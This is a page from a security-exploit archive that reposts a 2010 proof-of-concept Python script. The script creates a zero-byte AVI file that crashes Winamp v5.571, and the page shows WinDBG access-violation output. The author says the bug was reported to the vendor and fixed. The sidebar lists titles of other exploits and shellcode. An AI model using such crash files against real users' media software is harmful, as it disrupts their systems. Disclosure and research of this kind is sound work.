首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Winamp v5.571 Malicious AVI Denial of Service
来源:vfocus.net 作者:Darshanam 发布时间:2010-06-29  

# Tested on Windows 7 and Winamp v5.571(x86)
# This bug is informed to Nullsoft and was fixed long back.
# The status can be found at http://forums.winamp.com/showthread.php?s=&threadid=316000
# This code works on Python 3.0. To make it work on <3.0 remove braces in print

print("\n***Winamp v5.571 malicious AVI file handling DoS Vulnerability***\n")

try:
        open('winampcrash.avi', 'w')
        print ("Creating malicious AVI file . . . \n")
        print ("Successfully created Zero size AVI file\n")
        print ("Open created Zero size AVI file in Winamp.....Boom\n\n")
except IOError:                    
        print ("Unable to create Zero size AVI file\n")
       

 


"""
Following is the WinDBG status when we open winampcrash.AVI file in Winamp v5.571(x86)

(f00.e60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=0886fe68 edi=02880618
eip=076243f1 esp=0886fc50 ebp=0886ff28 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
in_AVI!winampGetInModule2+0x13da:
076243f1 8b4008          mov     eax,dword ptr [eax+8] ds:002b:00000008=????????


"""


#Best Regards,
#Praveen Darshanam


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MemDb Multiple Remote Dos
·Mozilla Firefox 3.6.6 Denial o
·GSM SIM Utility sms file Local
·Linux/ARM - setuid(0) & execve
·Linux/ARM - execve("/bin/sh","
·Linux/ARM - setuid(0) & kill(-
·Netartmedia iBoutique.MALL SQL
·Polymorphic /bin/sh x86 linux
·UFO: Alien Invasion v2.2.1 Rem
·Linux/ARM chmod("/etc/shadow",
·Free MP3 CD Ripper 1.0 (0day)
·TheWorld Browser 3.1.6.8 DOS E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved